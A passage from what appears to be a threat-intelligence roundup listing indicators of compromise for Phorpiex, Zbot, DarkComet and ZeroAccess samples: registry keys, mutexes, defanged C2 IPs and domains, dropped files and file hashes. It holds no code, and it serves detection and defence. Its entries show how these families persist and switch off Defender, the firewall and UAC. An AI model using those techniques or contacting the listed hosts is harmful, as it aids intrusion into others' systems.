DEFENDER ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableOnAccessProtection ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER\\REAL-TIME PROTECTION \nValue Name: DisableScanOnRealtimeEnable ` | 26 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 11 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`72[.]22[.]185[.]208` | 17 \n`72[.]22[.]185[.]200` | 9 \n`116[.]203[.]16[.]95` | 5 \n`216[.]239[.]32[.]21` | 4 \n`216[.]239[.]36[.]21` | 3 \n`82[.]146[.]46[.]153` | 3 \n`107[.]173[.]6[.]251` | 3 \n`78[.]155[.]207[.]139` | 3 \n`216[.]239[.]34[.]21` | 2 \n`176[.]58[.]123[.]25` | 2 \n`177[.]124[.]37[.]208` | 2 \n`201[.]184[.]69[.]50` | 2 \n`179[.]189[.]241[.]254` | 2 \n`36[.]66[.]115[.]180` | 2 \n`177[.]36[.]5[.]7` | 2 \n`185[.]86[.]150[.]130` | 2 \n`149[.]154[.]70[.]202` | 2 \n`195[.]123[.]246[.]188` | 2 \n`185[.]117[.]119[.]163` | 2 \n`172[.]217[.]12[.]179` | 1 \n`104[.]20[.]17[.]242` | 1 \n`185[.]248[.]87[.]88` | 1 \n`80[.]173[.]224[.]81` | 1 \n`103[.]122[.]33[.]58` | 1 \n`177[.]107[.]51[.]162` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip[.]anysrc[.]net` | 5 \n`myexternalip[.]com` | 4 \n`ipecho[.]net` | 4 \n`api[.]ipify[.]org` | 4 \n`ident[.]me` | 2 \n`checkip[.]amazonaws[.]com` | 2 \n`www[.]myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`api[.]ip[.]sb` | 1 \n`wtfismyip[.]com` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\wnetwork\\settings.ini` | 26 \n`%System32%\\Tasks\\Windows Network` | 26 \n`%APPDATA%\\wnetwork` | 26 \n`%APPDATA%\\WNETWORK\\<original file name>.exe` | 26 \n \n#### File Hashes\n\n` 0997acfd174ab60400f87700683b13a8e30003187a1ac95f8e03e7ef42722ed0 16a4034a84ee8568cb2f8eb5dadabc4602c0a8e8868f73672d50dfbf1a7f4d58 1b4e99fdce2dd1e3fec9d2544d998991b7db608fc546f3fcd095116c74abf5a6 1d004310b4da6128d37fbbc500fd2edaaac340ad0c02a6d955bb865b6bbf5a36 22a575f49efea2455bba405158a36e037ffb74a54d19a3594b9b91496235b94a 33174b58598cbfad8263865a35541f8cb45fb8c6bfef793fe8cf959386a01f5d 3614608cb133bd6ee5c664d32a70a4f6daabd51c5aa3e8305481a2c8e8e5e050 3be01a7decf86e147148172f9fd49a1dddb0fc61fa19f1f513200bef005d5621 533fbff0ab14351994eda4fdbfd54521f69b26aea55f1f4cbdc0a766ea665475 63fc0be214ba24b78e8af0c3fcc739bc65f2c93f47f2c0fd5fc36fab7c3b1ee9 6664ecbb04496f8769bd64664cc927aa5b3da2d8db2c90c74f9115d13611f2ee 690160e08d961b5eb173e8d83489182ff1bc593fbacc1ccef29d34b2c123f852 6f9d90e562dbc99bf48c6da0f62acca06483e4cc237f823fd420972e4cab8acb 84b2e1dadf6434fbd682ad5443c07fd584e9ba90ca78cff4e34453da08f9b1a0 8a8e4c0576135b4d7e53e8d371cbaa3044d04aa7487b5165d3a25c7ceb98ef40 8b3ce83864c0fe181a9dc5fc05db1ed0f5b8fa8afb21bf47e13cb42012f99d37 90343d4a110021355c361ba1187512cd992644f1f563451014c330b6100c31bb 918b82b76908de34fc26f1addda953604c608071d2e960aa7ac024dac36b445a 93c68821eea7086225918c163c8480f2f49f3a6b155a221af7211c795ce6b32e 977cc7fd45f54546066ab08ae04f31876d2347948b2631a011756f2a45f8588e 99aad62bb62905258fd7b9ee63811f16c0cb686dc86b49e5f33e0d465d2ecc0b a169e851112a15be3a17a6059e50cfedccd2928a7a2afde40aa21a13bbb31dd5 a77f072f98bba728809627c5cce0408dffd1e6277a5febf654f11c8e5a63f6c7 a94fb77c70d6d08e50aa251e619f7f6a2bd0983322677a5f0b38ba3cd2c46abb aa2709ee07f4479a85e0d64e8f4f08c87ff747fe658f8e93e30713ab6d46724c `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-dINdaoH_6J8/XcWWSG5Lu4I/AAAAAAAAC5g/xt-_H4TWgJEEUL2OlqKNW8gXOAgvOO60QCLcBGAsYHQ/s1600/1d004310b4da6128d37fbbc500fd2edaaac340ad0c02a6d955bb865b6bbf5a36_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Phorpiex-7373816-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Service ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Service ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Impersonate ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Asynchronous ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: MaxWait ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: DllName ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\PIXEDFU \nValue Name: Startup ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: pixedfu ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: FFC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BCC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: *BCC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 00FFC6F26321 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: C6F26321 ` | 1 \nMutexes | Occurrences \n---|--- \n`.:-Tldr-:.` | 10 \n`A9MTX7ERFAMKLQ` | 3 \n`A9ZLO3DAFRVH1WAE` | 3 \n`AhY93G7iia` | 3 \n`B81XZCHO7OLPA` | 3 \n`BSKLZ1RVAUON` | 3 \n`F-DAH77-LLP` | 3 \n`FURLENTG3a` | 3 \n`FstCNMutex` | 3 \n`GJLAAZGJI156R` | 3 \n`I-103-139-900557` | 3 \n`I106865886KMTX` | 3 \n`IGBIASAARMOAIZ` | 3 \n`J8OSEXAZLIYSQ8J` | 3 \n`LXCV0IMGIXS0RTA1` | 3 \n`MKS8IUMZ13NOZ` | 3 \n`OLZTR-AFHK11` | 3 \n`OPLXSDF19WRQ` | 3 \n`PLAX7FASCI8AMNA` | 3 \n`RGT70AXCNUUD3` | 3 \n`TEKL1AFHJ3` | 3 \n`TXA19EQZP13A6JTR` | 3 \n`VSHBZL6SWAG0C` | 3 \n`chimvietnong` | 3 \n`drofyunfdou` | 3 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`92[.]63[.]197[.]106` | 10 \n`66[.]199[.]229[.]251` | 3 \n`216[.]58[.]206[.]81` | 3 \n`141[.]101[.]129[.]46` | 3 \n`141[.]101[.]129[.]45` | 3 \n`172[.]217[.]7[.]174` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ofoanefubehauufdu[.]ru` | 11 \n`osgohfoeaugfoauef[.]ru` | 8 \n`dio[.]shojnoc[.]com` | 3 \n`dia[.]shojnoc[.]com` | 2 \n`ieguaoeuafhoauedg[.]ru` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 12 \n`\\.lnk` | 12 \n`E:\\.lnk` | 12 \n`E:\\$RECYCLE.BIN` | 12 \n`E:\\_` | 12 \n`E:\\_\\DeviceManager.exe` | 12 \n`%SystemRoot%\\T-580580975794906058` | 12 \n`%APPDATA%\\winsvcmgr.txt` | 12 \n`%SystemRoot%\\T-580580975794906058\\winsvc.exe` | 12 \n`%HOMEPATH%\\Local Settings\\Application Data\\pixedfu.dll` | 3 \n`%LOCALAPPDATA%\\pixedfu.dll` | 3 \n`%TEMP%\\323221246224071.exe` | 2 \n`\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\AppData\\_HELP_INSTRUCTION.TXT` | 1 \n`%APPDATA%\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Desktop\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Documents\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Downloads\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Favorites\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Links\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\Saved Games\\_HELP_INSTRUCTION.TXT` | 1 \n`%HOMEPATH%\\_HELP_INSTRUCTION.TXT` | 1 \n`%PUBLIC%\\Music\\Sample Music\\12EAEF0D255F4C3289F8C16727C42FE6.BACKUP` | 1 \n`%PUBLIC%\\Music\\Sample Music\\20410F1A046679B6EE5BB84B050B5D6A.BACKUP` | 1 \n`%PUBLIC%\\Music\\Sample Music\\CD5F520B00FF264246AA4685031109F6.BACKUP` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 01800a0b77486384e49b910debe10f7cee0b315bcf58fde71697f0dd4ec3540e 2032430a872c8bf354dcd1d6ae0f7aca4d02f5b4f0dcfa43ce3d1f795c8c9c72 43503180b734d83a724db448cd4d94b1b4a3096dabec6b9411af061337af8c35 5cf483ced208bc37ee1e71346a22615c88ee294a8b3b411b5d11e77571e2e4fd 7aa31bf90f13024bbcb547c126115b112b17a130fc8169712351c418f93516ca 86d2c77b7dc01092d3591f95f99a7ba79c06e06e83759b7965d18032102a823a 8e56d2ba3bf9e86c66e0eeafe453a8c36f692b4f22edb9e96fecaaef8e894d51 94179eab10b3a394790f3bfd5cf10c5bcabb16cd534997f6361064ac5e686342 af69f159ac7741ff8c72ea41fe76436512c84f7de6870caa6268ca28ac87aabd c6365099edb25124ad0ac0ffbe5a246d3d27a15c42e5bebb3a6a5994797611ef ca4a36212c31444ed2f0c173c0fb9a2ca43a8cfdf2ba7663b3eea52e150a02f3 cea3556aa39780fa88283ac4b89f75bb9e0070fc870f8c2f2940d74c124999ca d70bed520eccb3afa3ebaac4a1644e1b603e407c386a5a3dfeee864acc8be52d e1ef644770cf7cb312df7b2112a140386e246e6bb8c5fb607707e08bc1ad31ad e96f931910f1f64cadda65519f52c5ccd2311cd9d4aa705815b28a21559a4f18 f00fe52b605c93783f69f8ff95605484c73600a0c4ef33336b565e3adfd7bf8b f22b9841d6cfca96f89543e43f6dce478dbed764c3083b7a2dce8ba42e8a2b34 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1rixAc0aBNI/XcWWiOeLsAI/AAAAAAAAC5o/KflN-Y8gTYM1-_vl2Ca0dz28748UIQfcwCLcBGAsYHQ/s1600/5cf483ced208bc37ee1e71346a22615c88ee294a8b3b411b5d11e77571e2e4fd_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Zbot-7373691-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 48 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 48 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\aybbmte` | 48 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 48 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 48 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 42 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 42 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 42 \n \n#### File Hashes\n\n` 0008d767954ff4cd48317862040f44a8550279d2f80730db9d8c9a6c3e6f69f7 01b1b04fd8af635ddc5953b9c3bd87d510c38476477f201fa59b6ac1ebc89265 02e089e46e5d3a515394aec09a6f8a37cb8be989730bc9a7c29660bfe8f2e1aa 0878a61c44c6f24ea9b7455e663c9ae1f059f5581067957564af8cc90d7bead1 08c3aed6e3b36b219a22d80947cb02a1da27cdd955dcab8938f366c938641d99 0a586547643e008b351990181c6434a4ad1b1d91e2d8cfd2dcc654459e415652 0be41d1d76850b8b1bd55121ecb12c43b20493e7ef00a83d366092998b126a66 1142bde6260aacc7770f40931f1b10a3d72e479e482536590df5c8af3fe7cdb2 11f76ef08d086a6e3f87466f8a77c7bc63dd754dbd5aaf27deaf4e78abe46c4e 12ccd85f6d507d2b558259c0e987c1c0d104dddd62af38b6597c21055bb35f7e 13235beb6e3d194b599cc7cb1eb82ced9cad5ee17ddac09ae13942aed2b4ff14 143471cc5a4f7299a4009841fb1b92ec52bec2f78b426281d0bacc02946855b7 171fdd6c8d3e43050ab23eb0327fd74094ec7d813c5fb4f2f5668a6650e5088a 1be73946fc11127b9587440b45b8ba9452273c1b47698060562f5d6b0c914514 1ed93147bbaf222006509898c620b1cb65866d1f57d12c7f69a0db49cb459730 20a5e8c87d9d5f9c4f212c8324e1c51941c2c92e4193bb460454451c43763c65 23a1c96747d375ef9098389078a48ffe53305fce872ae8d056697aa1f4aee4bf 23f6e421ea4cdb20ba4d0f1b94100847dd67537fa438d0b0579579bca2aa9e64 249534c79cd24e2d4f756ee051f5fa3da34a85ac4d60b24afc19d0d01b03f446 24cfdb52074fedadb316ec85968e36576f44660b618edc8582c4a9d1134a4344 25bac99d7d11cb4a6da8d9a1742da2e31bc59751ed7d557677a11c5ec251a149 285c4a1f783602c538395337b0724f384806f308be12fef1654f77f667762412 29286b6965a37a18bb510f2ceff996456133395c0af62e2d87e58c86877b7a5b 296d4d39691aa73e5392b57a1dff3cf34f7f1e3548ab38d22e7c1bcceb30fc11 2bf03d005dc768b24c4a27218e41c5781902edd872f934d24c02958fd172fbc0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-y_89MF6JiSQ/XcWWvf1lbjI/AAAAAAAAC5w/TfLgCfHaaFQfsmUfsqmuItv9tqAFPZeDQCLcBGAsYHQ/s1600/4b93b20f209a34073d128875fb8bafcb482331a2f39f3eda3af78d4850d630a9_amp.png>)\n\n \n\n\n* * *\n\n### Win.Malware.DarkComet-7371375-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION\\EXPLORERN \nValue Name: NoControlPanel ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\CURRENTVERSION\\EXPLORERN ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-F54S21D` | 10 \n`DC_MUTEX-<random, matching [A-Z0-9]{7}>` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]67[.]72[.]218` | 5 \n`189[.]24[.]196[.]171` | 3 \n`187[.]14[.]155[.]193` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\dclogs` | 12 \n`%TEMP%\\tmpcmd.bat` | 1 \n \n#### File Hashes\n\n` 198fd0be4b6734556acf2ac56b3caff28d402ef10c0875180ab02a62d320b9c1 3201cfb883cd1c3b8f13b639a40cd08b3a701df41d6488228b586d7909a6f9c3 384fb4c37f5649edff99a8ce89b65b66a74fffe0e27dc8ad0abc6b949391e7e6 386a72805830c4e97a5970ab2c50e973394d2f0c2d89f1be33219a79ae988ab5 3ca6b7c42876362f7c1b27c86e45f5d95443a385ffa01226ab25cea998176219 42b444b7738492be745183895147d005f825dfa44c4b2cb1e256f6a146e3fa63 54f3ab508247399214721d27e61b5f9be1797cf54e1f80590a6075f1086df697 6283cb17aa670de5710f160fe411ba49cd8d6f12ec96141c787311f03d3dbfa0 7175a539ad4450790dcb7fc70b3a83c8fb85001b2fca89e5bdef6b106175c586 7d82900300161ba47eb3ec68e9ebea0f55986a33affff5bbe43e0dd5fee2d907 a7b843e8ece17f12410ed58e1de94c03126d74192d3732dae6071aefb6b190f2 b18d500a121437df8d1170fdf315b8dbe53d0f69214963a665c484bc47a1d3cd b7cfcc21847f1be733342c7c635d30152e3cbc7ac456d44faeb3d0d61933f02d d4c3d0934d55956d694a8097bcd0b69c4743e681ab1985e689d71827514fdd63 dcfc58bbe29cd4d7634c21ac390cca9c3f12becaf8584ac3d3a90da2cd329585 fbaf7fd94f82e6f9dc6de640564350f00b0901763249e14ad29748a79bc41a43 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YAjhHX1eebw/XcWW8b_sG4I/AAAAAAAAC54/AhmyiOLTkHYdgwspk5bpXeRm6kK9VWFTACLcBGAsYHQ/s1600/3ca6b7c42876362f7c1b27c86e45f5d95443a385ffa01226ab25cea998176219_amp.png>)\n\n \n\n\n* * *\n\n### Win.Packed.ZeroAccess-7370742-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 8 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 \nValue Name: ThreadingModel ` | 8 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 ` | 8 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 8 \n`<HKLM>\\SOFTWARE\\CLASSES\\CLSID\\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\\INPROCSERVER32 ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000010 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004 \nValue Name: PackedCatalogItem ` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`180[.]254[.]253[.]254` | 8 \n`166[.]254[.]253[.]254` | 8 \n`135[.]254[.]253[.]254` | 8 \n`117[.]254[.]253[.]254` | 8 \n`119[.]254[.]253[.]254` | 8 \n`134[.]254[.]253[.]254` | 8 \n`206[.]254[.]253[.]254` | 8 \n`222[.]254[.]253[.]254` | 8 \n`182[.]254[.]253[.]254` | 8 \n`190[.]254[.]253[.]254` | 8 \n`184[.]254[.]253[.]254` | 8 \n`197[.]254[.]253[.]254` | 8 \n`66[.]44[.]141[.]253` | 8 \n`183[.]254[.]253[.]254` | 8 \n`158[.]254[.]253[.]254` | 8 \n`204[.]254[.]253[.]254` | 8 \n`230[.]254[.]253[.]254` | 8 \n`71[.]17[.]221[.]85` | 7 \n`217[.]209[.]16[.]149` | 7 \n`84[.]40[.]68[.]14` | 7 \n`75[.]64[.]4[.]243` | 7 \n`24[.]145[.]85[.]120` | 7 \n`83[.]233[.]106[.]6` | 7 \n`24[.]176[.]111[.]7` | 7 \n`24[.]92[.]71[.]93` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 8 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 8 \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 8 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 8 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 8 \n`\\$Recycle.Bin\\S-1-5-18` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`%ProgramFiles%\\Windows Defender\\MSASCui.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpAsDesc.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpClient.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCmdRun.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCommu.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpEvMsg.dll:!` | 8 